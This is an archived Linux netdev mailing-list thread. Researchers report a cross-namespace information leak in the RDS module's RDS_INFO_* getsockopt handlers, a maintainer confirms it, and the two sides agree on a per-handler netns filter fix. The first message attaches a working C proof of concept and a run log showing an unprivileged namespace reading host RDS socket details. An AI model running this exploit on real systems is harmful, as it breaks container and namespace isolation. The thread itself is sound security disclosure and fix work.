Netdev List
 help / color / mirror / Atom feed
* rds: possible cross netns leak via RDS_INFO_* getsockopt
@ 2026-05-05  8:37 Xie Maoyi
  2026-05-05 22:07 ` Allison Henderson
  0 siblings, 1 reply; 3+ messages in thread
From: Xie Maoyi @ 2026-05-05  8:37 UTC (permalink / raw)
  To: achender@kernel.org
  Cc: netdev@vger.kernel.org, linux-rdma@vger.kernel.org,
	rds-devel@oss.oracle.com

[-- Attachment #1: Type: text/plain, Size: 2600 bytes --]

Hi all,

We are not sure whether what we observed is a real bug or
intended behaviour. We would appreciate your view.

In net/rds/info.c, rds_info_getsockopt() dispatches to handlers
registered in rds_info_funcs[]. Each handler reads a global list
that is not pernet:

  rds_sock_info / rds6_sock_info        -> rds_sock_list
  rds_tcp_tc_info / rds6_tcp_tc_info    -> rds_tcp_tc_list
  rds_conn_info / rds6_conn_info        -> rds_conn_hash[]

None of those filter by the caller's netns. rds_info_getsockopt()
also has no netns or capable() check. rds_create() has no
capable() check either. So AF_RDS is reachable from an
unprivileged user namespace.

Our reading is that an unprivileged caller in a fresh user_ns
plus netns can read RDS state from init_net. We see this in
practice on the latest net tree.

The fields that come back include:

  RDS_INFO_SOCKETS:     bound addr, port, sock inode of every
                        RDS socket on the host
  RDS_INFO_TCP_SOCKETS: peer addr, port, last_sent_nxt,
                        last_expected_una, last_seen_una of
                        every rds-tcp connection on the host
  RDS_INFO_CONNECTIONS: peer addr, port, cp_next_tx_seq,
                        cp_next_rx_seq of every RDS connection

A small reproducer is attached as poc_rds_info.c. With rds and
rds_tcp loaded, the steps are:

  modprobe rds
  modprobe rds_tcp
  ./poc_rds_info

The PoC binds an AF_RDS socket in init_net to 127.0.0.1:4242 as
root. It then enters a fresh user_ns plus netns and opens AF_RDS
there. The attacker side reads RDS_INFO_SOCKETS and sees the
init_net socket. A run log is attached as poc_verification.log.

We are not sure if this counts as a bug or is by design. The
RDS_INFO_* interface looks diagnostic. It may be expected to be
host wide. On the other hand, AF_RDS is reachable from an
unprivileged user namespace, which is what surprised us.

Could you let us know whether you consider this worth fixing? If
yes, we have a draft patch that gates rds_info_getsockopt() to
init_net. We can send it once you confirm the direction.

Thanks for your time.

Maoyi Xie and Praveen Kakkolangara

Maoyi Xie
Nanyang Technological University
https://maoyixie.com/
________________________________

CONFIDENTIALITY: This email is intended solely for the person(s) named and may be confidential and/or privileged. If you are not the intended recipient, please delete it, notify us and do not copy, use, or disclose its contents.
Towards a sustainable earth: Print only when necessary. Thank you.

[-- Attachment #2: poc_verification.log --]
[-- Type: application/octet-stream, Size: 1183 bytes --]

[victim] AF_RDS bound 127.0.0.1:4242 in init_net (root)
[init-probe] count-probe(SOCKETS) rc=-1 errno=28 optlen-after=56
[init-probe] getsockopt(SOCKETS) rc=28 (each=28) len=28 -> 1 entries
    [0] bound=127.0.0.1:4242 inum=3913 sndbuf=106496 rcvbuf=106496
    *** LEAK: this is the victim's init_net socket (127.0.0.1:4242) — visible from attacker's fresh netns ***
[init-probe] count-probe(TCP_SOCKETS) rc=41 errno=28 optlen-after=0
[init-probe] getsockopt(COUNTERS) rc=40 (each=40) len=1680 -> 42 entries
[attacker] in netns=net:[4026532260] uid=0
[attacker] AF_RDS opened in fresh netns -> fd=4
[attacker] count-probe(SOCKETS) rc=-1 errno=28 optlen-after=56
[attacker] getsockopt(SOCKETS) rc=28 (each=28) len=28 -> 1 entries
    [0] bound=127.0.0.1:4242 inum=3913 sndbuf=106496 rcvbuf=106496
    *** LEAK: this is the victim's init_net socket (127.0.0.1:4242) — visible from attacker's fresh netns ***
[attacker] count-probe(TCP_SOCKETS) rc=41 errno=28 optlen-after=0
[attacker] getsockopt(TCP_SOCKETS) rc=41 (each=41) len=0 -> 0 entries
[attacker] count-probe(CONNECTIONS) rc=42 errno=28 optlen-after=0
[attacker] getsockopt(COUNTERS) rc=40 (each=40) len=1680 -> 42 entries

[-- Attachment #3: poc_rds_info.c --]
[-- Type: text/plain, Size: 5895 bytes --]

/* PoC v2: RDS RDS_INFO_* cross-netns getsockopt leak.
 * Build: gcc poc_rds_info.c -o poc_rds_info
 * Run as root in init_net.
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <arpa/inet.h>

#ifndef AF_RDS
#define AF_RDS 21
#endif
#ifndef SOL_RDS
#define SOL_RDS 276
#endif

#define RDS_INFO_COUNTERS         10000
#define RDS_INFO_CONNECTIONS      10001
#define RDS_INFO_SEND_MESSAGES    10003
#define RDS_INFO_RETRANS_MESSAGES 10004
#define RDS_INFO_RECV_MESSAGES    10005
#define RDS_INFO_SOCKETS          10006
#define RDS_INFO_TCP_SOCKETS      10007
#define RDS6_INFO_CONNECTIONS     10011
#define RDS6_INFO_SOCKETS         10015
#define RDS6_INFO_TCP_SOCKETS     10016

struct rds_info_socket {
    uint32_t sndbuf;
    uint32_t bound_addr;
    uint32_t connected_addr;
    uint16_t bound_port;
    uint16_t connected_port;
    uint32_t rcvbuf;
    uint64_t inum;
} __attribute__((packed));

#define VICTIM_PORT 4242

static const char *opt_name(int o) {
    switch(o){case 10000:return "COUNTERS";case 10001:return "CONNECTIONS";
    case 10003:return "SEND_MSG";case 10004:return "RETRANS_MSG";
    case 10005:return "RECV_MSG";case 10006:return "SOCKETS";
    case 10007:return "TCP_SOCKETS";case 10011:return "6_CONNECTIONS";
    case 10015:return "6_SOCKETS";case 10016:return "6_TCP_SOCKETS";}
    return "?";
}

static void probe_one(int s, int opt, const char *who) {
    char buf[8192];
    socklen_t len = sizeof(buf);
    int rc = getsockopt(s, SOL_RDS, opt, buf, &len);
    if (rc < 0) {
        fprintf(stderr, "[%s] getsockopt(%s) rc=%d errno=%d (%s)\n",
                who, opt_name(opt), rc, errno, strerror(errno));
        return;
    }
    int each = rc;
    int nentries = each ? (int)len / each : 0;
    fprintf(stderr, "[%s] getsockopt(%s) rc=%d (each=%d) len=%u -> %d entries\n",
            who, opt_name(opt), rc, each, (unsigned)len, nentries);
    if (opt == RDS_INFO_SOCKETS && nentries > 0) {
        struct rds_info_socket *si = (void *)buf;
        for (int i = 0; i < nentries; i++) {
            char b[32];
            inet_ntop(AF_INET, &si[i].bound_addr, b, sizeof(b));
            fprintf(stderr, "    [%d] bound=%s:%u inum=%llu sndbuf=%u rcvbuf=%u\n",
                    i, b, ntohs(si[i].bound_port),
                    (unsigned long long)si[i].inum,
                    si[i].sndbuf, si[i].rcvbuf);
            if (si[i].bound_addr == htonl(0x7f000001) &&
                ntohs(si[i].bound_port) == VICTIM_PORT) {
                fprintf(stderr,
                  "    *** LEAK: this is the victim's init_net socket "
                  "(127.0.0.1:%u) — visible from attacker's fresh netns ***\n",
                  VICTIM_PORT);
            }
        }
    }
}

static void probe_count(int s, int opt, const char *who) {
    /* len=0 -> kernel returns -ENOSPC + total in optlen, exposing count */
    char buf[1];
    socklen_t len = 0;
    int rc = getsockopt(s, SOL_RDS, opt, buf, &len);
    fprintf(stderr, "[%s] count-probe(%s) rc=%d errno=%d optlen-after=%u\n",
            who, opt_name(opt), rc, errno, (unsigned)len);
}

int main(void)
{
    /* Step 1: Victim socket in init_net. */
    int v = socket(AF_RDS, SOCK_SEQPACKET, 0);
    if (v < 0) { perror("victim socket(AF_RDS)"); return 2; }
    struct sockaddr_in vsin = { .sin_family = AF_INET,
                                .sin_port = htons(VICTIM_PORT) };
    inet_pton(AF_INET, "127.0.0.1", &vsin.sin_addr);
    if (bind(v, (struct sockaddr *)&vsin, sizeof(vsin)) < 0) {
        perror("victim bind"); return 2;
    }
    fprintf(stderr, "[victim] AF_RDS bound 127.0.0.1:%d in init_net (root)\n",
            VICTIM_PORT);

    /* Step 1b: probe from init_net to confirm rds_info works at all */
    int probe = socket(AF_RDS, SOCK_SEQPACKET, 0);
    if (probe >= 0) {
        probe_count(probe, RDS_INFO_SOCKETS, "init-probe");
        probe_one(probe,   RDS_INFO_SOCKETS, "init-probe");
        probe_count(probe, RDS_INFO_TCP_SOCKETS, "init-probe");
        probe_one(probe,   RDS_INFO_COUNTERS, "init-probe");
        close(probe);
    }

    /* Step 2: fork attacker into fresh user_ns + netns. */
    int pipefd[2]; pipe(pipefd);
    pid_t pid = fork();
    if (pid == 0) {
        close(pipefd[0]);
        if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
            perror("unshare"); _exit(2);
        }
        int fd; char b[64]; int n;
        if ((fd = open("/proc/self/setgroups", O_WRONLY)) >= 0) {
            write(fd, "deny", 4); close(fd);
        }
        fd = open("/proc/self/uid_map", O_WRONLY);
        n = snprintf(b, sizeof(b), "0 0 1\n"); write(fd, b, n); close(fd);
        fd = open("/proc/self/gid_map", O_WRONLY);
        n = snprintf(b, sizeof(b), "0 0 1\n"); write(fd, b, n); close(fd);

        char nsa[64]; int rl = readlink("/proc/self/ns/net", nsa, 63);
        if (rl > 0) nsa[rl] = 0;
        fprintf(stderr, "[attacker] in netns=%s uid=%u\n", nsa, getuid());

        int a = socket(AF_RDS, SOCK_SEQPACKET, 0);
        if (a < 0) { perror("[attacker] socket(AF_RDS)"); _exit(2); }
        fprintf(stderr, "[attacker] AF_RDS opened in fresh netns -> fd=%d\n", a);

        probe_count(a, RDS_INFO_SOCKETS,     "attacker");
        probe_one(a,   RDS_INFO_SOCKETS,     "attacker");
        probe_count(a, RDS_INFO_TCP_SOCKETS, "attacker");
        probe_one(a,   RDS_INFO_TCP_SOCKETS, "attacker");
        probe_count(a, RDS_INFO_CONNECTIONS, "attacker");
        probe_one(a,   RDS_INFO_COUNTERS,    "attacker");

        close(a);
        write(pipefd[1], "x", 1);
        _exit(0);
    }
    close(pipefd[1]);
    char tmp; read(pipefd[0], &tmp, 1);
    int status; waitpid(pid, &status, 0);
    close(v);
    return 0;
}

^ permalink raw reply	[flat|nested] 3+ messages in thread

* Re: rds: possible cross netns leak via RDS_INFO_* getsockopt
  2026-05-05  8:37 rds: possible cross netns leak via RDS_INFO_* getsockopt Xie Maoyi
@ 2026-05-05 22:07 ` Allison Henderson
  2026-05-06  7:10   ` Xie Maoyi
  0 siblings, 1 reply; 3+ messages in thread
From: Allison Henderson @ 2026-05-05 22:07 UTC (permalink / raw)
  To: Xie Maoyi
  Cc: netdev@vger.kernel.org, linux-rdma@vger.kernel.org,
	rds-devel@oss.oracle.com

On Tue, 2026-05-05 at 08:37 +0000, Xie Maoyi wrote:
> Hi all,
> 
> We are not sure whether what we observed is a real bug or
> intended behaviour. We would appreciate your view.
> 
> In net/rds/info.c, rds_info_getsockopt() dispatches to handlers
> registered in rds_info_funcs[]. Each handler reads a global list
> that is not pernet:
> 
>   rds_sock_info / rds6_sock_info        -> rds_sock_list
>   rds_tcp_tc_info / rds6_tcp_tc_info    -> rds_tcp_tc_list
>   rds_conn_info / rds6_conn_info        -> rds_conn_hash[]
> 
> None of those filter by the caller's netns. rds_info_getsockopt()
> also has no netns or capable() check. rds_create() has no
> capable() check either. So AF_RDS is reachable from an
> unprivileged user namespace.
> 
> Our reading is that an unprivileged caller in a fresh user_ns
> plus netns can read RDS state from init_net. We see this in
> practice on the latest net tree.
> 
> The fields that come back include:
> 
>   RDS_INFO_SOCKETS:     bound addr, port, sock inode of every
>                         RDS socket on the host
>   RDS_INFO_TCP_SOCKETS: peer addr, port, last_sent_nxt,
>                         last_expected_una, last_seen_una of
>                         every rds-tcp connection on the host
>   RDS_INFO_CONNECTIONS: peer addr, port, cp_next_tx_seq,
>                         cp_next_rx_seq of every RDS connection
> 
> A small reproducer is attached as poc_rds_info.c. With rds and
> rds_tcp loaded, the steps are:
> 
>   modprobe rds
>   modprobe rds_tcp
>   ./poc_rds_info
> 
> The PoC binds an AF_RDS socket in init_net to 127.0.0.1:4242 as
> root. It then enters a fresh user_ns plus netns and opens AF_RDS
> there. The attacker side reads RDS_INFO_SOCKETS and sees the
> init_net socket. A run log is attached as poc_verification.log.
> 
> We are not sure if this counts as a bug or is by design. The
> RDS_INFO_* interface looks diagnostic. It may be expected to be
> host wide. On the other hand, AF_RDS is reachable from an
> unprivileged user namespace, which is what surprised us.
> 
> Could you let us know whether you consider this worth fixing? If
> yes, we have a draft patch that gates rds_info_getsockopt() to
> init_net. We can send it once you confirm the direction.
> 
> Thanks for your time.
> 
> Maoyi Xie and Praveen Kakkolangara
> 
> Maoyi Xie
> Nanyang Technological University
> https://maoyixie.com/


Hi Xie,

Thanks for looking into this.  I think your findings are valid, diagnostic or debug tools shouldn't allow callers
visibility into another netns.  Note though that while the ib transport is limited to init_net the tcp transport is not
(see rds_set_transport()).  So one gate in rds_info_getsockopt would incorrectly filter netns that a tcp connection
might have legitimate visibility to. So the fix would need a filter in each of the three handlers you've identified,
where we can compare the netns of the socket to the netns of the entry (or c_net for connection paths), and only copy
info for relevant sockets instead of every entry in the respective global list/hash.

Allison

> ________________________________
> 
> CONFIDENTIALITY: This email is intended solely for the person(s) named and may be confidential and/or privileged. If you are not the intended recipient, please delete it, notify us and do not copy, use, or disclose its contents.
> Towards a sustainable earth: Print only when necessary. Thank you.


^ permalink raw reply	[flat|nested] 3+ messages in thread

* Re: rds: possible cross netns leak via RDS_INFO_* getsockopt
  2026-05-05 22:07 ` Allison Henderson
@ 2026-05-06  7:10   ` Xie Maoyi
  0 siblings, 0 replies; 3+ messages in thread
From: Xie Maoyi @ 2026-05-06  7:10 UTC (permalink / raw)
  To: Allison Henderson
  Cc: netdev@vger.kernel.org, linux-rdma@vger.kernel.org,
	rds-devel@oss.oracle.com

Hi Allison,

Thanks for confirming the direction.

We will rewrite the patch as a per entry netns filter in each
of the affected handlers, instead of the init_net gate in
rds_info_getsockopt() that we mentioned. Concretely:

  rds_sock_info / rds6_sock_info: skip rds_sock_list entries
    whose socket netns does not match the caller's netns.
  rds_tcp_tc_info / rds6_tcp_tc_info: skip rds_tcp_tc_list
    entries the same way.
  rds_conn_info / rds6_conn_info and the *_message_info_*
    variants: skip rds_conn_hash[] entries whose c_net does
    not match the caller's netns.

This preserves the rds-tcp behaviour where a caller outside
init_net with legitimate connections in their own netns can
still see them.

We will send the patch as a separate reply once it is ready
and verified against the same PoC.

Thanks,

Maoyi Xie and Praveen Kakkolangara

Maoyi Xie
Nanyang Technological University
https://maoyixie.com/
________________________________

CONFIDENTIALITY: This email is intended solely for the person(s) named and may be confidential and/or privileged. If you are not the intended recipient, please delete it, notify us and do not copy, use, or disclose its contents.
Towards a sustainable earth: Print only when necessary. Thank you.

^ permalink raw reply	[flat|nested] 3+ messages in thread

end of thread, other threads:[~2026-05-06  7:10 UTC | newest]

Thread overview: 3+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2026-05-05  8:37 rds: possible cross netns leak via RDS_INFO_* getsockopt Xie Maoyi
2026-05-05 22:07 ` Allison Henderson
2026-05-06  7:10   ` Xie Maoyi

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox